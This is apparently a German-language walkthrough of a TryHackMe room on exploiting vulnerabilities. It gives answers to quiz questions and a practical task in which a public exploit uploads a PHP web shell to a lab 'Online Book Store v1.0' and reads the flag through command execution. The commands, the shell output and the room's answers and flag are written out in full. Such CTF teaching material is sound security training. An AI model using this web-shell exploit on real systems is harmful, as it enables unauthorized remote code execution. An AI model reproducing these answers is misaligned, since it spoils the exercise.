https://tryhackme.com/room/exploitingavulnerabilityv2
Task 1 Introduction
Keine Fragen in diesem Task.
Task 2 Automated Vs. Manual Vulnerability Research
Frage 1:
You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay)
Antwort 1:
yay
Frage 2:
You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this?
Antwort 2:
Injection
Frage 3:
You manage to impersonate another user. What vulnerability is this?
Antwort 3:
Broken Access Control
Task 3 Finding Manual Exploits
Frage 1:
What website would you use as a security researcher if you wanted to upload a Proof of Concept?
Antwort 1:
Github
Frage 2:
You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?
Antwort 2:
Searchsploit
Task 4 Example of Manual Exploitation
Frage 1:
What type of vulnerability was used in this attack?
Hier konnten wir Codes/Befehle ausführen, das bedeutet wir hatten eine Remote Code Execution.
Antwort 1:
Remote Code Execution
Task 5 Practical: Manual Exploitation
Frage 1:
Find out the version of the application that is running. What are the name and version number of the application?
Wir öffnen die IP unserer Machine im Browser und rufen so die zugehörige Website auf. Ganz unten rechts finden wir die verwendete Software und die Versionsnummer:

Antwort 1:
Online Book Store v1.0
Frage 2:
Now use the resources and skills from this module to find an exploit that will allow you to gain remote access to the vulnerable machine.
Diese Frage benötigt zwar keine Antwort, jedoch gehen wir die Schritte gemeinsam durch.
Wir suchen auf Google nach „Online Book Store v1.0 POC“ und haben mit dem ersten Ergebnis den gewünschten Exploit. Ich habe bewusst Google verwendet, da die Suche dort meist einfacher und unkomplizierter ist, als wenn man jede Datenbank händisch durchsucht.
Laden wir also den Exploit herunter.
Frage 3:
Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory?
Nachdem wir den Exploit heruntergeladen haben gehen wir in den Downloadpfad und starten den Exploit. Dazu geben wir die IP der Machine als http Pfad an, anschließend bestätigen wir mit „y“ und Enter:
└─$ python3 47887.py http://10.10.238.202
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.238.202/bootstrap/img/SOURBXIZEc.php
> Example command usage: http://10.10.238.202/bootstrap/img/SOURBXIZEc.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ whoami
www-data
Wir haben nun Zugriff als Benutzer „www-data“. Lassen wir uns den Inhalt des Servers und den Inhalt der Flag ausgeben:
RCE $ ls
OyWjgNLIbq.php
SOURBXIZEc.php
android_studio.jpg
beauty_js.jpg
c_14_quick.jpg
c_sharp_6.jpg
doing_good.jpg
flag.txt
img1.jpg
img2.jpg
img3.jpg
kotlin_250x250.png
logic_program.jpg
mobile_app.jpg
pro_asp4.jpg
pro_js.jpg
unnamed.png
web_app_dev.jpg
RCE $ cat flag.txt
THM{BOOK_KEEPING}
RCE $
Antwort 3:
THM{BOOK_KEEPING}